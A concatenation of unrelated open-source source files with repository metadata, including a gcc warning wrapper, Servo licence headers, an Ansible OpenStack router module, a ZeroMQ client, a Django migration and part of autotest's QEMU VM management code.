"RegionStore.cpp:1904",
"SymbolManager.cpp:484",
"RewriteObjCFoundationAPI.cpp:737",
"RewriteObjCFoundationAPI.cpp:696",
"CommentParser.cpp:394",
"CommentParser.cpp:391",
"CommentParser.cpp:356",
"LegalizeDAG.cpp:3646",
"IRBuilder.h:844",
"DataLayout.cpp:193",
"transport.c:653",
"xt_socket.c:307",
"xt_socket.c:161",
"inet_hashtables.h:356",
"xc4000.c:1049",
"xc4000.c:1063",
])
# Capture the name of the object file, can find it.
ofile = None
warning_re = re.compile(r'''(.*/|)([^/]+\.[a-z]+:\d+):(\d+:)? warning:''')
def interpret_warning(line):
"""Decode the message from gcc. The messages we care about have a filename, and a warning"""
line = line.rstrip('\n')
m = warning_re.match(line)
if m and m.group(2) not in allowed_warnings:
print "error, forbidden warning:", m.group(2)
# If there is a warning, remove any object if it exists.
if ofile:
try:
os.remove(ofile)
except OSError:
pass
sys.exit(1)
def run_gcc():
args = sys.argv[1:]
# Look for -o
try:
i = args.index('-o')
global ofile
ofile = args[i+1]
except (ValueError, IndexError):
pass
compiler = sys.argv[0]
try:
proc = subprocess.Popen(args, stderr=subprocess.PIPE)
for line in proc.stderr:
print line,
interpret_warning(line)
result = proc.wait()
except OSError as e:
result = e.errno
if result == errno.ENOENT:
print args[0] + ':',e.strerror
print 'Is your PATH set correctly?'
else:
print ' '.join(args), str(e)
return result
if __name__ == '__main__':
status = run_gcc()
sys.exit(status)
|
htc-msm8960/android_kernel_htc_msm8930
|
scripts/gcc-wrapper.py
|
Python
|
gpl-2.0
| 3,965 | 0.002774 |
# Copyright 2013 The Servo Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
# These licenses are valid for use in Servo
licenses = [
"""\
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
""",
"""\
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
""",
"""\
// This Source Code Form is subject to the terms of the Mozilla Public
// License, v. 2.0. If a copy of the MPL was not distributed with this
// file, You can obtain one at http://mozilla.org/MPL/2.0/.
""",
"""\
// Copyright 2013 The Servo Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
""",
"""\
# Copyright 2013 The Servo Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
""",
]
|
chotchki/servo
|
python/licenseck.py
|
Python
|
mpl-2.0
| 1,985 | 0.002519 |
from . import db
from .assoc import section_professor
class Professor(db.Model):
__tablename__ = 'professors'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'), unique=True)
first_name = db.Column(db.Text, nullable=False)
last_name = db.Column(db.Text)
university_id = db.Column(db.Integer, db.ForeignKey('universities.id'), nullable=False)
university = db.relationship('University', back_populates='professors')
sections = db.relationship('Section', secondary=section_professor, back_populates='professors')
evaluations = db.relationship('Evaluation', back_populates='professor')
__mapper_args__ = {
'polymorphic_identity': 'p',
}
def to_dict(self):
return {
'id': self.id,
'first_name': self.first_name,
'last_name': self.last_name
}
|
SCUEvals/scuevals-api
|
scuevals_api/models/professor.py
|
Python
|
agpl-3.0
| 905 | 0.00221 |
#!/usr/bin/python
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
try:
import shade
HAS_SHADE = True
except ImportError:
HAS_SHADE = False
DOCUMENTATION = '''
---
module: os_router
short_description: Create or delete routers from OpenStack
extends_documentation_fragment: openstack
version_added: "2.0"
author: "David Shrewsbury (@Shrews)"
description:
- Create or Delete routers from OpenStack. Although Neutron allows
routers to share the same name, this module enforces name uniqueness
to be more user friendly.
options:
state:
description:
- Indicate desired state of the resource
choices: ['present', 'absent']
default: present
name:
description:
- Name to be give to the router
required: true
admin_state_up:
description:
- Desired admin state of the created or existing router.
required: false
default: true
enable_snat:
description:
- Enable Source NAT (SNAT) attribute.
required: false
default: true
network:
description:
- Unique name or ID of the external gateway network.
type: string
required: true when I(interfaces) or I(enable_snat) are provided,
false otherwise.
default: None
external_fixed_ips:
description:
- The IP address parameters for the external gateway network. Each
is a dictionary with the subnet name or ID (subnet) and the IP
address to assign on the subnet (ip). If no IP is specified,
one is automatically assigned from that subnet.
required: false
default: None
interfaces:
description:
- List of subnets to attach to the router internal interface.
required: false
default: None
requirements: ["shade"]
'''
EXAMPLES = '''
# Create a simple router, not attached to a gateway or subnets.
- os_router:
cloud: mycloud
state: present
name: simple_router
# Creates a router attached to ext_network1 on an IPv4 subnet and one
# internal subnet interface.
- os_router:
cloud: mycloud
state: present
name: router1
network: ext_network1
external_fixed_ips:
- subnet: public-subnet
ip: 172.24.4.2
interfaces:
- private-subnet
# Update existing router1 external gateway to include the IPv6 subnet.
# Note that since 'interfaces' is not provided, any existing internal
# interfaces on an existing router will be left intact.
- os_router:
cloud: mycloud
state: present
name: router1
network: ext_network1
external_fixed_ips:
- subnet: public-subnet
ip: 172.24.4.2
- subnet: ipv6-public-subnet
ip: 2001:db8::3
# Delete router1
- os_router:
cloud: mycloud
state: absent
name: router1
'''
RETURN = '''
router:
description: Dictionary describing the router.
returned: On success when I(state) is 'present'
type: dictionary
contains:
id:
description: Router ID.
type: string
sample: "474acfe5-be34-494c-b339-50f06aa143e4"
name:
description: Router name.
type: string
sample: "router1"
admin_state_up:
description: Administrative state of the router.
type: boolean
sample: true
status:
description: The router status.
type: string
sample: "ACTIVE"
tenant_id:
description: The tenant ID.
type: string
sample: "861174b82b43463c9edc5202aadc60ef"
external_gateway_info:
description: The external gateway parameters.
type: dictionary
sample: {
"enable_snat": true,
"external_fixed_ips": [
{
"ip_address": "10.6.6.99",
"subnet_id": "4272cb52-a456-4c20-8f3c-c26024ecfa81"
}
]
}
routes:
description: The extra routes configuration for L3 router.
type: list
'''
def _needs_update(cloud, module, router, network, internal_subnet_ids):
"""Decide if the given router needs an update.
"""
if router['admin_state_up'] != module.params['admin_state_up']:
return True
if router['external_gateway_info']:
if router['external_gateway_info'].get('enable_snat', True) != module.params['enable_snat']:
return True
if network:
if not router['external_gateway_info']:
return True
elif router['external_gateway_info']['network_id'] != network['id']:
return True
# check external interfaces
if module.params['external_fixed_ips']:
for new_iface in module.params['external_fixed_ips']:
subnet = cloud.get_subnet(new_iface['subnet'])
exists = False
# compare the requested interface with existing, looking for an existing match
for existing_iface in router['external_gateway_info']['external_fixed_ips']:
if existing_iface['subnet_id'] == subnet['id']:
if 'ip' in new_iface:
if existing_iface['ip_address'] == new_iface['ip']:
# both subnet id and ip address match
exists = True
break
else:
# only the subnet was given, so ip doesn't matter
exists = True
break
# this interface isn't present on the existing router
if not exists:
return True
# check internal interfaces
if module.params['interfaces']:
existing_subnet_ids = []
for port in cloud.list_router_interfaces(router, 'internal'):
if 'fixed_ips' in port:
for fixed_ip in port['fixed_ips']:
existing_subnet_ids.append(fixed_ip['subnet_id'])
if set(internal_subnet_ids) != set(existing_subnet_ids):
return True
return False
def _system_state_change(cloud, module, router, network, internal_ids):
"""Check if the system state would be changed."""
state = module.params['state']
if state == 'absent' and router:
return True
if state == 'present':
if not router:
return True
return _needs_update(cloud, module, router, network, internal_ids)
return False
def _build_kwargs(cloud, module, router, network):
kwargs = {
'admin_state_up': module.params['admin_state_up'],
}
if router:
kwargs['name_or_id'] = router['id']
else:
kwargs['name'] = module.params['name']
if network:
kwargs['ext_gateway_net_id'] = network['id']
# can't send enable_snat unless we have a network
kwargs['enable_snat'] = module.params['enable_snat']
if module.params['external_fixed_ips']:
kwargs['ext_fixed_ips'] = []
for iface in module.params['external_fixed_ips']:
subnet = cloud.get_subnet(iface['subnet'])
d = {'subnet_id': subnet['id']}
if 'ip' in iface:
d['ip_address'] = iface['ip']
kwargs['ext_fixed_ips'].append(d)
return kwargs
def _validate_subnets(module, cloud):
external_subnet_ids = []
internal_subnet_ids = []
if module.params['external_fixed_ips']:
for iface in module.params['external_fixed_ips']:
subnet = cloud.get_subnet(iface['subnet'])
if not subnet:
module.fail_json(msg='subnet %s not found' % iface['subnet'])
external_subnet_ids.append(subnet['id'])
if module.params['interfaces']:
for iface in module.params['interfaces']:
subnet = cloud.get_subnet(iface)
if not subnet:
module.fail_json(msg='subnet %s not found' % iface)
internal_subnet_ids.append(subnet['id'])
return (external_subnet_ids, internal_subnet_ids)
def main():
argument_spec = openstack_full_argument_spec(
state=dict(default='present', choices=['absent', 'present']),
name=dict(required=True),
admin_state_up=dict(type='bool', default=True),
enable_snat=dict(type='bool', default=True),
network=dict(default=None),
interfaces=dict(type='list', default=None),
external_fixed_ips=dict(type='list', default=None),
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec,
supports_check_mode=True,
**module_kwargs)
if not HAS_SHADE:
module.fail_json(msg='shade is required for this module')
state = module.params['state']
name = module.params['name']
network = module.params['network']
if module.params['external_fixed_ips'] and not network:
module.fail_json(msg='network is required when supplying external_fixed_ips')
try:
cloud = shade.openstack_cloud(**module.params)
router = cloud.get_router(name)
net = None
if network:
net = cloud.get_network(network)
if not net:
module.fail_json(msg='network %s not found' % network)
# Validate and cache the subnet IDs so we can avoid duplicate checks
# and expensive API calls.
external_ids, internal_ids = _validate_subnets(module, cloud)
if module.check_mode:
module.exit_json(
changed=_system_state_change(cloud, module, router, net, internal_ids)
)
if state == 'present':
changed = False
if not router:
kwargs = _build_kwargs(cloud, module, router, net)
router = cloud.create_router(**kwargs)
for internal_subnet_id in internal_ids:
cloud.add_router_interface(router, subnet_id=internal_subnet_id)
changed = True
else:
if _needs_update(cloud, module, router, net, internal_ids):
kwargs = _build_kwargs(cloud, module, router, net)
router = cloud.update_router(**kwargs)
# On a router update, if any internal interfaces were supplied,
# just detach all existing internal interfaces and attach the new.
if internal_ids:
ports = cloud.list_router_interfaces(router, 'internal')
for port in ports:
cloud.remove_router_interface(router, port_id=port['id'])
for internal_subnet_id in internal_ids:
cloud.add_router_interface(router, subnet_id=internal_subnet_id)
changed = True
module.exit_json(changed=changed, router=router)
elif state == 'absent':
if not router:
module.exit_json(changed=False)
else:
# We need to detach all internal interfaces on a router before
# we will be allowed to delete it.
ports = cloud.list_router_interfaces(router, 'internal')
for port in ports:
cloud.remove_router_interface(router, port_id=port['id'])
cloud.delete_router(name)
module.exit_json(changed=True)
except shade.OpenStackCloudException as e:
module.fail_json(msg=e.message)
# this is magic, see lib/ansible/module_common.py
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == '__main__':
main()
|
tersmitten/ansible-modules-core
|
cloud/openstack/os_router.py
|
Python
|
gpl-3.0
| 12,382 | 0.001373 |
# -*- coding: utf-8 -*-
# Copyright 2010-2011 OpenStack Foundation
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Base TestCase for all cratonclient tests."""
import mock
import six
import sys
from oslotest import base
from cratonclient.shell import main
class TestCase(base.BaseTestCase):
"""Test case base class for all unit tests."""
class ShellTestCase(base.BaseTestCase):
"""Test case base class for all shell unit tests."""
def shell(self, arg_str, exitcodes=(0,)):
"""Main function for exercising the craton shell."""
with mock.patch('sys.stdout', new=six.StringIO()) as mock_stdout, \
mock.patch('sys.stderr', new=six.StringIO()) as mock_stderr:
try:
main_shell = main.CratonShell()
main_shell.main(arg_str.split())
except SystemExit:
exc_type, exc_value, exc_traceback = sys.exc_info()
self.assertIn(exc_value.code, exitcodes)
return (mock_stdout.getvalue(), mock_stderr.getvalue())
|
opstooling/python-cratonclient
|
cratonclient/tests/base.py
|
Python
|
apache-2.0
| 1,608 | 0.000622 |
# -*- coding: utf-8 -*-
"""
Написать функцию is_prime, принимающую 1 аргумент: число от 0 до 1000.
Если число простое, то функция возвращает True, а в противном случае - False.
"""
prime_1000 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997]
def is_prime(num):
if type(num) is "int":
raise TypeError("argument is not integer")
if num <= 0 or num > 1000:
raise ValueError("argument value out of bounds")
if num % 2 == 0:
return False
mass = prime_1000
i1 = 0
i2 = len(mass) - 1
while i1 < i2:
if num == mass[i1] or num == mass[i2]:
return True
mid = i2 - int(round((i2 - i1) / 2))
if num < mass[mid]:
i2 = mid - 1
elif num > mass[mid]:
i1 = mid + 1
else:
return True
return False
# -----------------------------------------------------------------------------
if __name__ == "__main__":
print is_prime(222)
|
victorivanovspb/challenge-accepted
|
resp_simple/is_prime.py
|
Python
|
gpl-3.0
| 1,857 | 0.005675 |
"""
Clone server Model Six
"""
import random
import time
import zmq
from clone import Clone
SUBTREE = "/client/"
def main():
# Create and connect clone
clone = Clone()
clone.subtree = SUBTREE
clone.connect("tcp://localhost", 5556)
clone.connect("tcp://localhost", 5566)
try:
while True:
# Distribute as key-value message
key = "%d" % random.randint(1,10000)
value = "%d" % random.randint(1,1000000)
clone.set(key, value, random.randint(0,30))
time.sleep(1)
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
|
soscpd/bee
|
root/tests/zguide/examples/Python/clonecli6.py
|
Python
|
mit
| 638 | 0.007837 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('zeltlager_registration', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='jugendgruppe',
name='address',
),
migrations.DeleteModel(
name='Jugendgruppe',
),
migrations.RemoveField(
model_name='zeltlagerdurchgang',
name='address',
),
migrations.RemoveField(
model_name='zeltlagerdurchgang',
name='description',
),
]
|
jjbgf/eventbooking
|
zeltlager_registration/migrations/0002_auto_20150211_2011.py
|
Python
|
gpl-2.0
| 675 | 0 |
"""
Utility classes and functions to handle Virtual Machine creation using qemu.
:copyright: 2008-2009 Red Hat Inc.
"""
import time
import os
import logging
import fcntl
import re
import commands
from autotest.client.shared import error
from autotest.client import utils
import utils_misc
import virt_vm
import test_setup
import storage
import qemu_monitor
import aexpect
import qemu_virtio_port
import remote
import data_dir
import utils_net
import qemu_devices
class QemuSegFaultError(virt_vm.VMError):
def __init__(self, crash_message):
virt_vm.VMError.__init__(self, crash_message)
self.crash_message = crash_message
def __str__(self):
return ("Qemu crashed: %s" % self.crash_message)
class VMMigrateProtoUnsupportedError(virt_vm.VMMigrateProtoUnknownError):
"""
When QEMU tells us it doesn't know about a given migration protocol.
This usually happens when we're testing older QEMU. It makes sense to
skip the test in this situation.
"""
def __init__(self, protocol, output):
self.protocol = protocol
self.output = output
def __str__(self):
return ("QEMU reports it doesn't know migration protocol '%s'. "
"QEMU output: %s" % (self.protocol, self.output))
class KVMInternalError(virt_vm.VMError):
pass
class ImageUnbootableError(virt_vm.VMError):
def __init__(self, name):
virt_vm.VMError.__init__(self, name)
self.name = name
def __str__(self):
return ("VM '%s' can't bootup from image,"
" check your boot disk image file." % self.name)
class VM(virt_vm.BaseVM):
"""
This class handles all basic VM operations.
"""
MIGRATION_PROTOS = ['rdma', 'x-rdma', 'tcp', 'unix', 'exec', 'fd']
# By default we inherit all timeouts from the base VM class except...
CLOSE_SESSION_TIMEOUT = 30
# Because we've seen qemu taking longer than 5 seconds to initialize
# itself completely, including creating the monitor sockets files
# which are used on create(), this timeout is considerably larger
# than the one on the base vm class
CREATE_TIMEOUT = 20
def __init__(self, name, params, root_dir, address_cache, state=None):
"""
Initialize the object and set a few attributes.
:param name: The name of the object
:param params: A dict containing VM params
(see method make_qemu_command for a full description)
:param root_dir: Base directory for relative filenames
:param address_cache: A dict that maps MAC addresses to IP addresses
:param state: If provided, use this as self.__dict__
"""
if state:
self.__dict__ = state
else:
self.process = None
self.serial_console = None
self.redirs = {}
self.spice_options = {}
self.vnc_port = 5900
self.monitors = []
self.virtio_ports = [] # virtio_console / virtio_serialport
self.pci_assignable = None
self.uuid = None
self.vcpu_threads = []
self.vhost_threads = []
self.devices = None
self.name = name
self.params = params
self.root_dir = root_dir
self.address_cache = address_cache
self.index_in_use = {}
# This usb_dev_dict member stores usb controller and device info,
# It's dict, each key is an id of usb controller,
# and key's value is a list, contains usb devices' ids which
# attach to this controller.
# A filled usb_dev_dict may look like:
# { "usb1" : ["stg1", "stg2", "stg3", "stg4", "stg5", "stg6"],
# "usb2" : ["stg7", "stg8"],
# ...
# }
# This structure can used in usb hotplug/unplug test.
self.usb_dev_dict = {}
self.logs = {}
self.logsessions = {}
self.driver_type = 'qemu'
self.params['driver_type_' + self.name] = self.driver_type
# virtnet init depends on vm_type/driver_type being set w/in params
super(VM, self).__init__(name, params)
# un-overwrite instance attribute, virtnet db lookups depend on this
if state:
self.instance = state['instance']
self.qemu_command = ''
self.start_time = 0.0
def verify_alive(self):
"""
Make sure the VM is alive and that the main monitor is responsive.
:raise VMDeadError: If the VM is dead
:raise: Various monitor exceptions if the monitor is unresponsive
"""
self.verify_disk_image_bootable()
self.verify_userspace_crash()
self.verify_kernel_crash()
self.verify_illegal_instruction()
self.verify_kvm_internal_error()
try:
virt_vm.BaseVM.verify_alive(self)
if self.monitor:
self.monitor.verify_responsive()
except virt_vm.VMDeadError:
raise virt_vm.VMDeadError(self.process.get_status(),
self.process.get_output())
def is_alive(self):
"""
Return True if the VM is alive and its monitor is responsive.
"""
return not self.is_dead() and (not self.monitor or
self.monitor.is_responsive())
def is_dead(self):
"""
Return True if the qemu process is dead.
"""
return not self.process or not self.process.is_alive()
def is_paused(self):
"""
Return True if the qemu process is paused ('stop'ed)
"""
if self.is_dead():
return False
try:
self.verify_status("paused")
return True
except virt_vm.VMStatusError:
return False
def verify_status(self, status):
"""
Check VM status
:param status: Optional VM status, 'running' or 'paused'
:raise VMStatusError: If the VM status is not same as parameter
"""
if not self.monitor.verify_status(status):
raise virt_vm.VMStatusError('Unexpected VM status: "%s"' %
self.monitor.get_status())
def verify_userspace_crash(self):
"""
Verify if the userspace component (qemu) crashed.
"""
if "(core dumped)" in self.process.get_output():
for line in self.process.get_output().splitlines():
if "(core dumped)" in line:
raise QemuSegFaultError(line)
def verify_kvm_internal_error(self):
"""
Verify KVM internal error.
"""
if "KVM internal error." in self.process.get_output():
out = self.process.get_output()
out = out[out.find("KVM internal error."):]
raise KVMInternalError(out)
def verify_disk_image_bootable(self):
if self.params.get("image_verify_bootable") == "yes":
pattern = self.params.get("image_unbootable_pattern")
if not pattern:
raise virt_vm.VMConfigMissingError(self.name,
"image_unbootable_pattern")
try:
seabios_log = self.logsessions['seabios'].get_output()
if re.search(pattern, seabios_log, re.S):
logging.error("Can't boot guest from image.")
# Set 'shutdown_command' to None to force autotest
# shuts down guest with monitor.
self.params["shutdown_command"] = None
raise ImageUnbootableError(self.name)
except KeyError:
pass
def clone(self, name=None, params=None, root_dir=None, address_cache=None,
copy_state=False):
"""
Return a clone of the VM object with optionally modified parameters.
The clone is initially not alive and needs to be started using create().
Any parameters not passed to this function are copied from the source
VM.
:param name: Optional new VM name
:param params: Optional new VM creation parameters
:param root_dir: Optional new base directory for relative filenames
:param address_cache: A dict that maps MAC addresses to IP addresses
:param copy_state: If True, copy the original VM's state to the clone.
Mainly useful for make_qemu_command().
"""
if name is None:
name = self.name
if params is None:
params = self.params.copy()
if root_dir is None:
root_dir = self.root_dir
if address_cache is None:
address_cache = self.address_cache
if copy_state:
state = self.__dict__.copy()
else:
state = None
return VM(name, params, root_dir, address_cache, state)
def get_serial_console_filename(self, name=None):
"""
Return the serial console filename.
:param name: The serial port name.
"""
if name:
return "/tmp/serial-%s-%s" % (name, self.instance)
return "/tmp/serial-%s" % self.instance
def get_serial_console_filenames(self):
"""
Return a list of all serial console filenames
(as specified in the VM's params).
"""
return [self.get_serial_console_filename(_) for _ in
self.params.objects("isa_serials")]
def make_create_command(self, name=None, params=None, root_dir=None):
"""
Generate a qemu command line. All parameters are optional. If a
parameter is not supplied, the corresponding value stored in the
class attributes is used.
:param name: The name of the object
:param params: A dict containing VM params
:param root_dir: Base directory for relative filenames
:note: The params dict should contain:
mem -- memory size in MBs
cdrom -- ISO filename to use with the qemu -cdrom parameter
extra_params -- a string to append to the qemu command
shell_port -- port of the remote shell daemon on the guest
(SSH, Telnet or the home-made Remote Shell Server)
shell_client -- client program to use for connecting to the
remote shell daemon on the guest (ssh, telnet or nc)
x11_display -- if specified, the DISPLAY environment variable
will be be set to this value for the qemu process (useful for
SDL rendering)
images -- a list of image object names, separated by spaces
nics -- a list of NIC object names, separated by spaces
For each image in images:
drive_format -- string to pass as 'if' parameter for this
image (e.g. ide, scsi)
image_snapshot -- if yes, pass 'snapshot=on' to qemu for
this image
image_boot -- if yes, pass 'boot=on' to qemu for this image
In addition, all parameters required by get_image_filename.
For each NIC in nics:
nic_model -- string to pass as 'model' parameter for this
NIC (e.g. e1000)
"""
# Helper function for command line option wrappers
def _add_option(option, value, option_type=None, first=False):
"""
Add option to qemu parameters.
"""
if first:
fmt = " %s=%s"
else:
fmt = ",%s=%s"
if option_type is bool:
# Decode value for bool parameter (supports True, False, None)
if value in ['yes', 'on', True]:
return fmt % (option, "on")
elif value in ['no', 'off', False]:
return fmt % (option, "off")
elif value and isinstance(value, bool):
return fmt % (option, "on")
elif value and isinstance(value, str):
# "EMPTY_STRING" and "NULL_STRING" is used for testing illegal
# foramt of option.
# "EMPTY_STRING": set option as a empty string "".
# "NO_EQUAL_STRING": set option as a option string only,
# even without "=".
# (In most case, qemu-kvm should recognize it as "<null>")
if value == "NO_EQUAL_STRING":
return ",%s" % option
if value == "EMPTY_STRING":
value = '""'
return fmt % (option, str(value))
return ""
# Wrappers for all supported qemu command line parameters.
# This is meant to allow support for multiple qemu versions.
# Each of these functions receives the output of 'qemu -help'
# as a parameter, and should add the requested command line
# option accordingly.
def add_name(devices, name):
return " -name '%s'" % name
def process_sandbox(devices, action):
if action == "add":
if devices.has_option("sandbox"):
return " -sandbox on "
elif action == "rem":
if devices.has_option("sandbox"):
return " -sandbox off "
def add_human_monitor(devices, monitor_name, filename):
if not devices.has_option("chardev"):
return " -monitor unix:'%s',server,nowait" % filename
monitor_id = "hmp_id_%s" % monitor_name
cmd = " -chardev socket"
cmd += _add_option("id", monitor_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -mon chardev=%s" % monitor_id
cmd += _add_option("mode", "readline")
return cmd
def add_qmp_monitor(devices, monitor_name, filename):
if not devices.has_option("qmp"):
logging.warn("Fallback to human monitor since qmp is"
" unsupported")
return add_human_monitor(devices, monitor_name, filename)
if not devices.has_option("chardev"):
return " -qmp unix:'%s',server,nowait" % filename
monitor_id = "qmp_id_%s" % monitor_name
cmd = " -chardev socket"
cmd += _add_option("id", monitor_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -mon chardev=%s" % monitor_id
cmd += _add_option("mode", "control")
return cmd
def add_serial(devices, name, filename):
if not devices.has_option("chardev"):
return " -serial unix:'%s',server,nowait" % filename
serial_id = "serial_id_%s" % name
cmd = " -chardev socket"
cmd += _add_option("id", serial_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -device isa-serial"
cmd += _add_option("chardev", serial_id)
return cmd
def add_virtio_port(devices, name, bus, filename, porttype, chardev,
name_prefix=None, index=None, extra_params=""):
"""
Appends virtio_serialport or virtio_console device to cmdline.
:param help: qemu -h output
:param name: Name of the port
:param bus: Which virtio-serial-pci device use
:param filename: Path to chardev filename
:param porttype: Type of the port (*serialport, console)
:param chardev: Which chardev to use (*socket, spicevmc)
:param name_prefix: Custom name prefix (port index is appended)
:param index: Index of the current virtio_port
:param extra_params: Space sepparated chardev params
"""
cmd = ''
# host chardev
if chardev == "spicevmc": # SPICE
cmd += " -chardev spicevmc,id=dev%s,name=%s" % (name, name)
else: # SOCKET
cmd = (" -chardev socket,id=dev%s,path=%s,server,nowait"
% (name, filename))
# virtport device
if porttype in ("console", "virtio_console"):
cmd += " -device virtconsole"
else:
cmd += " -device virtserialport"
if name_prefix: # used by spiceagent (com.redhat.spice.*)
port_name = "%s%d" % (name_prefix, index)
else:
port_name = name
cmd += ",chardev=dev%s,name=%s,id=%s" % (name, port_name, name)
cmd += _add_option("bus", bus)
# Space sepparated chardev params
_params = ""
for parm in extra_params.split():
_params += ',' + parm
cmd += _params
return cmd
def add_log_seabios(devices):
if not devices.has_device("isa-debugcon"):
return ""
default_id = "seabioslog_id_%s" % self.instance
filename = "/tmp/seabios-%s" % self.instance
self.logs["seabios"] = filename
cmd = " -chardev socket"
cmd += _add_option("id", default_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -device isa-debugcon"
cmd += _add_option("chardev", default_id)
cmd += _add_option("iobase", "0x402")
return cmd
def add_log_anaconda(devices):
chardev_id = "anacondalog_chardev_%s" % self.instance
vioser_id = "anacondalog_vioser_%s" % self.instance
filename = "/tmp/anaconda-%s" % self.instance
self.logs["anaconda"] = filename
dev = qemu_devices.QCustomDevice('chardev', backend='backend')
dev.set_param('backend', 'socket')
dev.set_param('id', chardev_id)
dev.set_param("path", filename)
dev.set_param("server", 'NO_EQUAL_STRING')
dev.set_param("nowait", 'NO_EQUAL_STRING')
devices.insert(dev)
dev = QDevice('virtio-serial-pci', parent_bus={'type': 'pci'})
dev.set_param("id", vioser_id)
devices.insert(dev)
dev = QDevice('virtserialport')
dev.set_param("bus", "%s.0" % vioser_id)
dev.set_param("chardev", chardev_id)
dev.set_param("name", "org.fedoraproject.anaconda.log.0")
devices.insert(dev)
def add_mem(devices, mem):
return " -m %s" % mem
def add_smp(devices):
smp_str = " -smp %d" % self.cpuinfo.smp
smp_pattern = "smp n\[,maxcpus=cpus\].*"
if devices.has_option(smp_pattern):
smp_str += ",maxcpus=%d" % self.cpuinfo.maxcpus
smp_str += ",cores=%d" % self.cpuinfo.cores
smp_str += ",threads=%d" % self.cpuinfo.threads
smp_str += ",sockets=%d" % self.cpuinfo.sockets
return smp_str
def add_nic(devices, vlan, model=None, mac=None, device_id=None,
netdev_id=None, nic_extra_params=None, pci_addr=None,
bootindex=None, queues=1, vectors=None):
if model == 'none':
return
if devices.has_option("device"):
if not model:
model = "rtl8139"
elif model == "virtio":
model = "virtio-net-pci"
dev = QDevice(model)
dev.set_param('mac', mac)
# only pci domain=0,bus=0,function=0 is supported for now.
#
# libvirt gains the pci_slot, free_pci_addr here,
# value by parsing the xml file, i.e. counting all the
# pci devices and store the number.
if model != 'spapr-vlan':
dev.parent_bus = {'type': 'pci'}
dev.set_param('addr', pci_addr)
if nic_extra_params:
nic_extra_params = (_.split('=', 1) for _ in
nic_extra_params.split(',') if _)
for key, val in nic_extra_params:
dev.set_param(key, val)
dev.set_param("bootindex", bootindex)
else:
dev = qemu_devices.QCustomDevice('net', backend='type')
dev.set_param('type', 'nic')
dev.set_param('model', model)
dev.set_param('macaddr', mac, 'NEED_QUOTE')
dev.set_param('id', device_id, 'NEED_QUOTE')
if "virtio" in model:
if int(queues) > 1:
dev.set_param('mq', 'on')
if vectors:
dev.set_param('vectors', vectors)
if devices.has_option("netdev"):
dev.set_param('netdev', netdev_id)
else:
dev.set_param('vlan', vlan)
devices.insert(dev)
